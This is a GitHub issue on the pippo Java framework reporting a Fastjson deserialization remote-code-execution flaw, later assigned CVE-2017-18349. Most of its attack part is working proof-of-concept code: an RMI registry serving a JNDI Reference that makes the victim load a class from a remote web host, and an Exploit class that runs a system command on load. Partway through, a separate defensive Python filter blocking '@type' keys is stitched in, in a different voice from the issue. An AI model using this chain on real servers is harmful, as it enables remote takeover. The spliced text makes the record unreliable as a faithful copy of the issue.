pippo-java/pippo

Leads to RCE when parsing a JSON string with Fastjson

idealzh opened this issue · 2 comments

The component FastjsonEngine converts a JSON string to an equivalent Java object using Fastjson (version 1.2.8).
However, Fastjson version 1.2.24 and prior has a remote code execution vulnerability.
For details, please refer to the links below:
https://fortiguard.com/encyclopedia/ips/44059
http://xxlegend.com/2017/12/06/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
Upgrading to Fastjson version 1.2.45 or later fixes the issue.

The following code snippet is used to convert a JSON string:

```java
POST("/json", routeContext -> {
    String data = routeContext.getRequest().getBody();
    FastjsonEngine engine = new FastjsonEngine();
    engine.fromString(data, String.class);
});
```

To exploit the vulnerability successfully, we need the following steps:
Step 1: start an RMI service;

```java
public class Test {
    /**
     * @param args
     * @throws RemoteException
     */
    public static void main(String[] args) throws RemoteException {
        // TODO Auto-generated method stub
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference reference = new Reference("Exploit", "Exploit", "http://10.0.2.4/");
        ReferenceWrapper referenceWrapper = null;
        try {
            referenceWrapper = new ReferenceWrapper(reference);
        } catch (NamingException e1) {
            // TODO Auto-generated catch block
            e1.printStackTrace();
        }
        try {
            registry.bind("Exploit", referenceWrapper);
        } catch (AlreadyBoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
        System.out.println("rmi server started......");
    }
}
```

Step 2: put Exploit.class under a web service directory pointed to by the RMI service above;

```java
public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Step 3: send a POST request containing the malicious JSON string;
demonstration
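A defender-side screening rule for an endpoint like the `/json` route above, added here as an illustration; it is not part of the issue or of pippo. The chain the issue links to depends on Fastjson's autoType mechanism, which is driven by a `"@type"` key in the input, and a route that deserialises into `String.class` has no legitimate use for such a key. The function rejects bodies that carry it at any depth, and also rejects bodies that are not well-formed JSON; the sample bodies and the class name in them are constructed placeholders.

```python
import json

# Fastjson's polymorphic type-hint key. Payloads that abuse autoType (the
# JdbcRowSetImpl chain referenced in the issue is one instance) must carry it.
AUTOTYPE_KEY = "@type"


def find_autotype_keys(node, path="$"):
    """Return JSONPath-like locations of every '@type' key in a parsed document."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == AUTOTYPE_KEY:
                hits.append(f"{path}.{key}")
            hits.extend(find_autotype_keys(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_autotype_keys(item, f"{path}[{index}]"))
    return hits


def screen_body(body):
    """Classify a request body before it is handed to FastjsonEngine.fromString().

    Returns (verdict, details): 'allow' with an empty list, 'block' with the
    locations of the offending keys, or 'invalid' with the parser error. Only
    input that a strict JSON parser accepts is forwarded, so the lenient
    downstream parser never sees anything this check could not inspect.
    """
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return "invalid", [str(exc)]
    hits = find_autotype_keys(doc)
    return ("block", hits) if hits else ("allow", [])


# Constructed sample bodies (not taken from the issue); the class name is a placeholder.
SAMPLES = {
    "plain": '"hello"',
    "object": '{"name": "pippo", "tags": ["a", "b"]}',
    "typed": '{"@type": "com.example.Placeholder", "x": 1}',
    "nested": '[{"ok": true}, {"inner": {"@type": "com.example.Placeholder"}}]',
    "broken": '{"name": ',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, screen_body(body))
```

Upgrading Fastjson as the issue recommends remains the actual fix; this check only narrows what reaches the parser in the meantime.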

rygel commented

@idealzh Thank you for reporting this issue and your suggestion of how to fix it!

CVE-2017-18349 was assigned to this issue.